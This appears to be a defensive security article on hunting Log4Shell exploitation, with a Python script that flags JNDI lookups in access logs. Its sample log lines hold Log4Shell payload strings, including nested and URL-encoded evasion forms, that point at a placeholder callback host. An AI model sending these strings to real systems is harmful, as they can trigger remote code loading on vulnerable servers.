One year after Log4Shell was first made public, the open-source logging library it affects remains a prime target for malicious actors. Given how widely Log4j is deployed, organizations must remain diligent when patching or redeploying vulnerable systems.
Effective security requires a proactive strategy that integrates preventative controls with detection and response mechanisms. Automated tools detect many threats, but human threat hunters remain the best defense against advanced ones.
Hypothesis-Based Hunting
Hypothesis-Based Hunting is a security strategy that can keep you ahead of Log4Shell by detecting adversary behavior before the adversary is able to execute code. Threat hunters build and test hypotheses based on threat intelligence, experience with the actor, and careful observation of the environment.
Hypothesis-based investigations differ from detection-based hunts in that they require hunters to collect data from endpoints across the environment, process that data, and only then test it against predefined hypotheses.
Hunters should be aware of biases or poor analytical habits that might influence how they form hypotheses. For instance, a hunter who previously worked in a government setting focused on specific threats may find it easy to prejudge a new environment.
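As an added example (not code from the original article), here is one way to turn the hypothesis-based hunt described above into a test over collected data. The hypothesis is that Log4Shell exploitation attempts show up in web-server access logs as JNDI lookup strings, sometimes URL-encoded or split apart with nested Log4j lookups such as `${lower:j}`. The log lines and the callback host are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines for the hunt (not real traffic); the callback host is a placeholder.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2022:12:01:03 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2022:12:01:07 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://callback.example/a}"',
    '10.0.0.9 - - [10/Dec/2022:12:01:09 +0000] "GET /login HTTP/1.1" 200 88 "-" "${${lower:j}ndi:rmi://callback.example/b}"',
    '10.0.0.7 - - [10/Dec/2022:12:02:00 +0000] "GET /search?q=%24%7Bjndi%3Adns%3A%2F%2Fcallback.example%7D HTTP/1.1" 200 1024 "-" "curl/7.68"',
]

# Two documented Log4j 2 lookup forms that each resolve to a single character and are
# used to break up the literal string "jndi": ${lower:X} / ${upper:X} and the default-value form ${::-X}.
_NESTED = re.compile(r"\$\{(?:lower|upper):(\w)\}|\$\{::-(\w)\}", re.IGNORECASE)
# A JNDI lookup using one of the protocol schemes the hypothesis expects to see.
_JNDI = re.compile(r"\$\{jndi:(ldaps?|rmi|dns|iiop|corba|nds|https?):", re.IGNORECASE)


def normalize(text: str) -> str:
    """Undo URL-encoding and single-character lookup nesting until the text stops changing."""
    prev = None
    while prev != text:
        prev = text
        text = unquote(text)
        text = _NESTED.sub(lambda m: m.group(1) or m.group(2), text)
    return text


def hunt(lines):
    """Test the hypothesis: return (line_number, scheme) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines):
        match = _JNDI.search(normalize(line))
        if match:
            hits.append((number, match.group(1).lower()))
    return hits


if __name__ == "__main__":
    for number, scheme in hunt(SAMPLE_LOGS):
        print(f"line {number}: jndi:{scheme} lookup found")
```

A hit confirms an attempt was made, not that it succeeded; the next step in the hunt is to check whether the logging host made an outbound connection to the named callback around that timestamp.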
Incident Response
The incident response process aims to minimize damage and time to recovery for an organization. It includes preparation; detection and analysis; and containment and eradication.
Preparation involves creating an incident response plan, policies and procedures, and defining roles and responsibilities for your team. Doing so keeps the team organized and able to respond to incidents quickly.
Detection and analysis are essential steps in uncovering malicious activity on your network. They also allow you to gather evidence for further in-depth investigation.
At this stage of incident response, teams should also document and retain the evidence they collect to build a case for prosecution. This is one of the most crucial elements of incident handling, yet it is often overlooked and should never be neglected.
Threat Hunting
Threat hunting is a proactive methodology, supported by tooling, designed to keep organizations ahead of cyber-attackers. Security teams use it to find threats that have evaded traditional tools like SIEMs or UEBA solutions.
Data enrichment helps identify suspicious behavior that could indicate an attacker's intent or ability to carry out an attack. Human judgment also plays a role, finding patterns in the data that automated tools cannot detect.
Structured Hunts: Structured hunts are designed around indicators of attack (IoA) and tactics, techniques and procedures (TTPs). This type of investigation searches for patterns both before and after detection to help identify the threat actor.
Situational Hunts: Situational hunts are designed around what is known about a threat actor's activities, such as previous attacks. This type of investigation typically begins with a risk assessment and uses external attack data to detect trending TTPs.
The objective of a successful threat hunt is to collect vital information that can be used to respond, to prioritize, to analyze, and to retain for later. Doing this helps prevent similar attacks in the future and lets security measures be improved accordingly.
MDR
As attack techniques evolve and attackers become more proficient, organizations require an ever-evolving pool of people and technology to stay ahead. Unfortunately, this can prove challenging for many companies, particularly small and medium-sized ones.
Managed detection and response (MDR) services offer a solution. This approach integrates an extended detection and response (XDR) or endpoint detection and response (EDR) platform with a team of experts who monitor networks, logs and events in real time to detect threats.
MDR providers can respond rapidly to cybersecurity incidents, helping organizations shorten the window in which malicious actors can exploit vulnerabilities. MDR provides 24/7 monitoring, threat hunting, alert prioritization and remediation, all backed by service level agreements (SLAs).